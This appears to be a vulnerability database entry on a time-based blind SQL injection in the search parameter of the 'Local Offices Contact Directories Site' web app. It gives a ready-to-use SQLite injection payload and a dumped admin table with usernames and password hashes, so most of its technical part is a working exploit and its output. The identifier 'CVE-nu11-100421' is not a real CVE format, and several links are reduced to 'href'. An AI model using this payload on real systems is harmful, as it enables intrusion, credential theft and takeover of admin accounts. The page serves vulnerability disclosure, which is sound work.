Attacker Value
Very High
(3 users assessed)
Exploitability
Very High
(3 users assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
3

CVE-nu11-100421

Last updated October 04, 2021
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated

Description

The search parameter appears to be vulnerable to time-based blind SQL injection attacks, on the web app “Local Offices Contact Directories Site” (by oretnom23). The malicious attacker can execute a malicious payload and he can dump hashes authentication credentials. Then the attacker can to take control of the admin account of the system and can steal sensitive information and can destroy the system administrative account.

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

fool-CVE-nu11-100421

Vendor:

href

Description:

The search parameter appears to be vulnerable to time-based blind SQL injection attacks, on the web app “Local Offices Contact Directories Site” (by oretnom23).
The malicious attacker can execute a malicious payload and he can dump hashes authentication credentials. Then the attacker can to
take control of the admin account of the system and can steal sensitive information and can destroy the system administrative account.

Payload:

---
Parameter: search (GET)
    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245 AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
  • dump
Table: admin_list
[2 entries]
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 |
| cblake   | cd74fae0a3adf459f73bbf187607ccea |
+----------+----------------------------------+

Reproduce:

href

Proof:

href

General Information

Exploited in the Wild

Reported by:
Technical Analysis